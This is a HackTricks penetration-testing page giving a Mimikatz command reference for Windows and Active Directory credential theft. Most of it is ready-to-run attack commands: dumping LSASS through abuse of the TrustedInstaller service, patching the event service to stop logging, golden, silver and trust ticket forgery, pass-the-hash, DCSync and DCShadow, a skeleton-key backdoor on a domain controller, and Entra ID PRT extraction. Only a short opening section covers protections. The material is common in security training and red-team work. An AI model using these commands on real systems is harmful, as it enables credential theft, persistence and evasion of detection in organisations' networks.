credentials-mimikatz.md (11800B)
1 --- 2 title: "Mimikatz" 3 section: "Windows" 4 sectionSlug: "windows-hardening" 5 sourcePath: "src/windows-hardening/stealing-credentials/credentials-mimikatz.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/windows-hardening/stealing-credentials/credentials-mimikatz.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # Mimikatz 14 15 **This page is based on one from [adsecurity.org](https://adsecurity.org/?page_id=1821)**. Check the original for further info!<sup>[[3]](#references)</sup> 16 17 ## LM and Clear-Text in memory 18 19 From Windows 8.1 and Windows Server 2012 R2 onwards, significant measures have been implemented to safeguard against credential theft: 20 21 - **LM hashes and plain-text passwords** are no longer stored in memory to enhance security. A specific registry setting, _HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest "UseLogonCredential"_ must be configured with a DWORD value of `0` to disable Digest Authentication, ensuring "clear-text" passwords are not cached in LSASS. 22 23 - **LSA Protection** is introduced to shield the Local Security Authority (LSA) process from unauthorized memory reading and code injection. This is achieved by marking the LSASS as a protected process. Activation of LSA Protection involves: 24 1. Modifying the registry at _HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa_ by setting `RunAsPPL` to `dword:00000001`. 25 2. Implementing a Group Policy Object (GPO) that enforces this registry change across managed devices. 26 27 Despite these protections, tools like Mimikatz can circumvent LSA Protection using specific drivers, although such actions are likely to be recorded in event logs. 28 29 On modern workstations this matters even more because **Credential Guard is enabled by default on many Windows 11 22H2+ and Windows Server 2025 domain-joined, non-DC systems**, while **LSASS-as-PPL is enabled by default on fresh Windows 11 22H2+ installs**. In practice, this means `sekurlsa::logonpasswords` often yields less material than older tradecraft expected and operators increasingly pivot to **offline minidumps**, **Kerberos key extraction (`sekurlsa::ekeys`)**, or **CloudAP/PRT-oriented modules**. For the protection side, check [Windows credentials protections](/hacktricks/windows-hardening/stealing-credentials/credentials-protections). 30 31 ### Counteracting SeDebugPrivilege Removal 32 33 Administrators typically have SeDebugPrivilege, enabling them to debug programs. This privilege can be restricted to prevent unauthorized memory dumps, a common technique used by attackers to extract credentials from memory. However, even with this privilege removed, the TrustedInstaller account can still perform memory dumps using a customized service configuration: 34 35 ```bash 36 sc config TrustedInstaller binPath= "C:\\Users\\Public\\procdump64.exe -accepteula -ma lsass.exe C:\\Users\\Public\\lsass.dmp" 37 sc start TrustedInstaller 38 ``` 39 40 This allows the dumping of the `lsass.exe` memory to a file, which can then be analyzed on another system to extract credentials: 41 42 ```text 43 # privilege::debug 44 # sekurlsa::minidump lsass.dmp 45 # sekurlsa::logonpasswords 46 ``` 47 48 ## Mimikatz Options 49 50 Event log tampering in Mimikatz involves two primary actions: clearing event logs and patching the Event service to prevent logging of new events. Below are the commands for performing these actions: 51 52 #### Clearing Event Logs 53 54 - **Command**: This action is aimed at deleting the event logs, making it harder to track malicious activities. 55 - Mimikatz does not provide a direct command in its standard documentation for clearing event logs directly via its command line. However, event log manipulation typically involves using system tools or scripts outside of Mimikatz to clear specific logs (e.g., using PowerShell or Windows Event Viewer). 56 57 #### Experimental Feature: Patching the Event Service 58 59 - **Command**: `event::drop` 60 - This experimental command is designed to modify the Event Logging Service's behavior, effectively preventing it from recording new events. 61 - Example: `mimikatz "privilege::debug" "event::drop" exit` 62 63 - The `privilege::debug` command ensures that Mimikatz operates with the necessary privileges to modify system services. 64 - The `event::drop` command then patches the Event Logging service. 65 66 ### Kerberos Ticket Attacks 67 68 Use the commands below as quick syntax reminders. The dedicated pages for [golden tickets](/hacktricks/windows-hardening/active-directory-methodology/golden-ticket), [silver tickets](/hacktricks/windows-hardening/active-directory-methodology/silver-ticket), [diamond tickets](/hacktricks/windows-hardening/active-directory-methodology/diamond-ticket), and [over-pass-the-hash / pass-the-key](/hacktricks/windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key) contain the up-to-date AES/PAC/opsec nuances. 69 70 ### Golden Ticket Creation 71 72 A Golden Ticket allows for domain-wide access impersonation. Key command and parameters: 73 74 - Command: `kerberos::golden` 75 - Parameters: 76 - `/domain`: The domain name. 77 - `/sid`: The domain's Security Identifier (SID). 78 - `/user`: The username to impersonate. 79 - `/krbtgt`: The NTLM hash of the domain's KDC service account. 80 - `/ptt`: Directly injects the ticket into memory. 81 - `/ticket`: Saves the ticket for later use. 82 83 Example: 84 85 ```bash 86 mimikatz "kerberos::golden /user:admin /domain:example.com /sid:S-1-5-21-123456789-123456789-123456789 /krbtgt:ntlmhash /ptt" exit 87 ``` 88 89 ### Silver Ticket Creation 90 91 Silver Tickets grant access to specific services. Key command and parameters: 92 93 - Command: Similar to Golden Ticket but targets specific services. 94 - Parameters: 95 - `/service`: The service to target (e.g., cifs, http). 96 - Other parameters similar to Golden Ticket. 97 98 Example: 99 100 ```bash 101 mimikatz "kerberos::golden /user:user /domain:example.com /sid:S-1-5-21-123456789-123456789-123456789 /target:service.example.com /service:cifs /rc4:ntlmhash /ptt" exit 102 ``` 103 104 ### Trust Ticket Creation 105 106 Trust Tickets are used for accessing resources across domains by leveraging trust relationships. Key command and parameters: 107 108 - Command: Similar to Golden Ticket but for trust relationships. 109 - Parameters: 110 - `/target`: The target domain's FQDN. 111 - `/rc4`: The NTLM hash for the trust account. 112 113 Example: 114 115 ```bash 116 mimikatz "kerberos::golden /domain:child.example.com /sid:S-1-5-21-123456789-123456789-123456789 /sids:S-1-5-21-987654321-987654321-987654321-519 /rc4:ntlmhash /user:admin /service:krbtgt /target:parent.example.com /ptt" exit 117 ``` 118 119 ### Additional Kerberos Commands 120 121 - **Listing Tickets**: 122 123 - Command: `kerberos::list` 124 - Lists all Kerberos tickets for the current user session. 125 126 - **Pass the Cache**: 127 128 - Command: `kerberos::ptc` 129 - Injects Kerberos tickets from cache files. 130 - Example: `mimikatz "kerberos::ptc /ticket:ticket.kirbi" exit` 131 132 - **Pass the Ticket**: 133 134 - Command: `kerberos::ptt` 135 - Allows using a Kerberos ticket in another session. 136 - Example: `mimikatz "kerberos::ptt /ticket:ticket.kirbi" exit` 137 138 - **Purge Tickets**: 139 - Command: `kerberos::purge` 140 - Clears all Kerberos tickets from the session. 141 - Useful before using ticket manipulation commands to avoid conflicts. 142 143 ### Over-Pass-the-Hash / Pass-the-Key 144 145 If `RC4` is disabled or unreliable, Mimikatz can patch **AES128/AES256 Kerberos keys** into the current logon session instead of only using an NT hash. This is usually a better fit for modern domains than treating `sekurlsa::pth` as NTLM-only.<sup>[[1]](#references)</sup> 146 147 ```bash 148 mimikatz "privilege::debug" "sekurlsa::ekeys" exit 149 mimikatz "sekurlsa::pth /user:svc_sql /domain:corp.local /aes256:<AES256_HEX> /run:powershell.exe" exit 150 mimikatz "sekurlsa::pth /user:administrator /domain:corp.local /ntlm:<NT_HASH> /impersonate" exit 151 ``` 152 153 `/impersonate` reuses the current process instead of spawning a new console, which is handy when you want to immediately run things like `lsadump::dcsync` in the same context. 154 155 ### Active Directory Tampering 156 157 - **DCShadow**: Temporarily make a machine act as a DC for AD object manipulation. See [DCShadow](/hacktricks/windows-hardening/active-directory-methodology/dcshadow). 158 159 - `mimikatz "lsadump::dcshadow /object:targetObject /attribute:attributeName /value:newValue" exit` 160 161 - **DCSync**: Mimic a DC to request password data. See [DCSync](/hacktricks/windows-hardening/active-directory-methodology/dcsync). 162 - `mimikatz "lsadump::dcsync /user:targetUser /domain:targetDomain" exit` 163 164 ### Credential Access 165 166 - **LSADUMP::LSA**: Extract credentials from LSA. 167 168 - `mimikatz "lsadump::lsa /inject" exit` 169 170 - **LSADUMP::NetSync**: Impersonate a DC using a computer account's password data. 171 172 - _No specific command provided for NetSync in original context._ 173 174 - **LSADUMP::SAM**: Access local SAM database. 175 176 - `mimikatz "lsadump::sam" exit` 177 178 - **LSADUMP::Secrets**: Decrypt secrets stored in the registry. 179 180 - `mimikatz "lsadump::secrets" exit` 181 182 - **LSADUMP::SetNTLM**: Set a new NTLM hash for a user. 183 184 - `mimikatz "lsadump::setntlm /user:targetUser /ntlm:newNtlmHash" exit` 185 186 - **LSADUMP::Trust**: Retrieve trust authentication information. 187 - `mimikatz "lsadump::trust" exit` 188 189 ### Cloud credentials / Entra ID 190 191 On **Entra ID** or **hybrid-joined** hosts, `sekurlsa::cloudap` can expose cached **Primary Refresh Token (PRT)** material from LSASS. If the associated Proof-of-Possession key is software-protected, `dpapi::cloudapkd` can derive the clear/derived key material needed for follow-on **Pass-the-PRT** workflows.<sup>[[1]](#references)</sup> 192 193 ```bash 194 mimikatz "privilege::debug" "sekurlsa::cloudap" exit 195 mimikatz "dpapi::cloudapkd /keyvalue:<ProofOfPossessionKey> /unprotect" exit 196 mimikatz "dpapi::cloudapkd /context:<CONTEXT> /derivedkey:<DERIVED_KEY> /prt:<PRT>" exit 197 ``` 198 199 This becomes much harder when the key is TPM-backed, but it is worth checking on hybrid endpoints because the cached CloudAP data may be more interesting than classic `wdigest` output.<sup>[[2]](#references)</sup> For the cloud-side abuse chain, see [Pass the PRT](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.html). 200 201 ### Miscellaneous 202 203 - **MISC::Skeleton**: Inject a backdoor into LSASS on a DC. 204 - `mimikatz "privilege::debug" "misc::skeleton" exit` 205 206 ### Privilege Escalation 207 208 - **PRIVILEGE::Backup**: Acquire backup rights. 209 210 - `mimikatz "privilege::backup" exit` 211 212 - **PRIVILEGE::Debug**: Obtain debug privileges. 213 - `mimikatz "privilege::debug" exit` 214 215 ### Credential Dumping 216 217 - **SEKURLSA::LogonPasswords**: Show credentials for logged-on users. 218 219 - `mimikatz "sekurlsa::logonpasswords" exit` 220 221 - **SEKURLSA::Tickets**: Extract Kerberos tickets from memory. 222 - `mimikatz "sekurlsa::tickets /export" exit` 223 224 ### Sid and Token Manipulation 225 226 - **SID::add/modify**: Change SID and SIDHistory. 227 228 - Add: `mimikatz "sid::add /user:targetUser /sid:newSid" exit` 229 - Modify: _No specific command for modify in original context._ 230 231 - **TOKEN::Elevate**: Impersonate tokens. 232 - `mimikatz "token::elevate /domainadmin" exit` 233 234 ### Terminal Services 235 236 - **TS::MultiRDP**: Allow multiple RDP sessions. 237 238 - `mimikatz "ts::multirdp" exit` 239 240 - **TS::Sessions**: List TS/RDP sessions. 241 - _No specific command provided for TS::Sessions in original context._ 242 243 ### Vault 244 245 - Extract passwords from Windows Vault. 246 - `mimikatz "vault::cred /patch" exit` 247 248 249 ## References 250 251 - [1] [The Hacker Tools – Mimikatz modules](https://tools.thehacker.recipes/mimikatz/modules/) 252 - [2] [Synacktiv – WHFB and Entra ID: Say Hello to your new cache flow](https://www.synacktiv.com/en/publications/whfb-and-entra-id-say-hello-to-your-new-cache-flow) 253 - [3] [Mimikatz command reference](https://adsecurity.org/?page_id=1821)